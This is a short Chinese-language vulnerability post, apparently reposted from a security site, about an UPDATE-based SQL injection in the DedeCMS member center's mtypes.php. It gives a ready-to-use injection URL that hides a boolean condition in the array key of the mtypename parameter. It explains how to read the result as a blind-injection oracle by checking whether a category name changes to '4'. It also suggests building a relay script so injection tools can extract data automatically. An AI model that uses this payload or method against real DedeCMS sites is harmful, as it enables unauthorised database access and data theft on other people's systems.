Dedecms 会员中心注入漏洞4

文章目录

漏洞作者: Matt

[/crayon]

漏洞证明:

因为是update注入

并且用了>ExecuteNoneQuery 所以延时注入都不行

但是 可以通过一个判断来进行忙注 如果条件成功 那么mtypename=’$name’ 就会被update了

首先打开

http://127.0.0.1/dede/member/mtypes.php

添加一个分类 记住ID 和原来的分类名称

然后打开

http://127.0.0.1/dede/member/mtypes.php?dopost=save&mtypename[2′ or @' AND 1%3D1 and (select ‘r’)%3D’r’ and ‘1’%3D’1]=4

将其中的2改成你的分类ID

完了打开之后 在返回http://127.0.0.1/dede/member/mtypes.php 如果(select ‘r’)=’r’的话 那么分类名称就被改成了4! 这样我们就能来判断是否满足条件了!

可以写一个中专程序

首先访问http://127.0.0.1/dede/member/mtypes.php?dopost=save&mtypename[2′ or @' AND 1%3D1 and (select ‘r’)%3D’r’ and ‘1’%3D’1]=4 然后再返回http://127.0.0.1/dede/member/mtypes.php

的内容 这样就可以用工具跑了,。,中专就懒得写了。。这个注入还是很强大的一点也不费事

14161512c815a12d1eabb2c643b37663b2f22808

测试前

141615303adc80fed14fa685e3c54c8ff1a92588

测试后

14161541b5dea9c462e006e4c1dfdc43e3241ce7

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录